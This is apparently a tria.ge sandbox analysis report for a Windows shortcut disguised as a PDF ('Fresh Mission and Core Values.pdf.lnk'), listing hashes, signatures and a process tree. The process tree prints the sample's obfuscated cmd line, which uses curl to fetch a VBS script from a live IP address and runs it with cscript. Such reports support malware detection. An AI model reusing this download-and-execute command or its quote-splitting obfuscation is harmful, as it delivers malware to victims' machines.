Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    12/10/2023, 04:27

General

  • Target

    Fresh Mission and Core Values.pdf.lnk

  • Size

    2KB

  • MD5

    cea0885964c5c18fd7410ca82e0da52e

  • SHA1

    272151f1e4f39fd79457dc3f1538103f153c5bf8

  • SHA256

    e69a776549f8c3e68d4729dde9a1679f633d230bca21b6a2144dfd5599269d6e

  • SHA512

    3e0c9105e096d880750f43f3fd2e2b15b917a7e5c616367b16b16761b43065584238038d9bf9012c8b8227558d97c321268f299eba2c29227fd8ea5dc7a7c5e0

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Fresh Mission and Core Values.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c kdYh || EchO kdYh & p"in"G kdYh || cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & p"in"G -n 3 kdYh || C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & eXit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\system32\PING.EXE
        p"in"G kdYh
        3⤵
        • Runs ping.exe
        PID:812
      • C:\Windows\system32\PING.EXE
        p"in"G -n 3 kdYh
        3⤵
        • Runs ping.exe
        PID:3032
      • C:\Windows\system32\cscript.exe
        C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs
        3⤵
          PID:2612

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads